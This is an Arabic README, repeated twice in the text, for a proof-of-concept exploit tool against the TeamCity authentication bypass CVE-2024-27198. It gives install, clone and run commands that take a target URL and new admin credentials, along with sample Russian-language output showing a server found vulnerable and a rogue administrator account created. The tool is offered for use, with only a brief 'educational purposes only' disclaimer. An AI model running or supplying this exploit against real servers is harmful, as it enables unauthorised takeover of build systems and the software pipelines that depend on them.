
هي أداة إثبات مفهوم (PoC) تستهدف ثغرة أمنية في خادم TeamCity (CVE-2024-27198)
GenTeamCityExploit هي أداة PoC تستهدف ثغرة أمنية في خادم TeamCity (CVE-2024-27198). تمكن من اكتشاف إصدار TeamCity وإنشاء مستخدم مسؤول جديد عن طريق استغلال خلل في تجاوز المصادقة.
pip install requests urllib3
git clone https://github.com/geniuszly/CVE-2024-27198
cd CVE-2024-27198
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
-t, --target: رابط خادم TeamCity المستهدف.-u, --username: اسم المستخدم للمسؤول الجديد.-p, --password: كلمة المرور للمسؤول الجديد.python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
في حال لم يكن الخادم عرضة للثغرة أو لم يتم العثور على الإصدار:
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
إذا حدث خطأ في الاتصال بالخادم:
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
هذه الأداة مخصصة للأغراض التعليمية فقط ولا ينبغي استخدامها على أي أنظمة دون إذن صريح من المالك. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
GenTeamCityExploit هي أداة PoC تستهدف ثغرة أمنية في خادم TeamCity (CVE-2024-27198). تسمح باكتشاف إصدار TeamCity وإنشاء مسؤول جديد باستخدام ثغرة تجاوز المصادقة.
pip install requests urllib3
git clone https://github.com/geniuszly/CVE-2024-27198
cd CVE-2024-27198
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
-t, --target: رابط خادم TeamCity المستهدف.-u, --username: اسم المستخدم للمسؤول الجديد.-p, --password: كلمة المرور للمسؤول الجديد.python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
في حال لم يكن الخادم عرضة للثغرة أو لم يتم العثور على الإصدار:
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
عند حدوث خطأ في الاتصال بالخادم:
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
هذه الأداة مخصصة للأغراض التعليمية فقط ولا ينبغي استخدامها على أي أنظمة دون إذن صريح من المالك. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.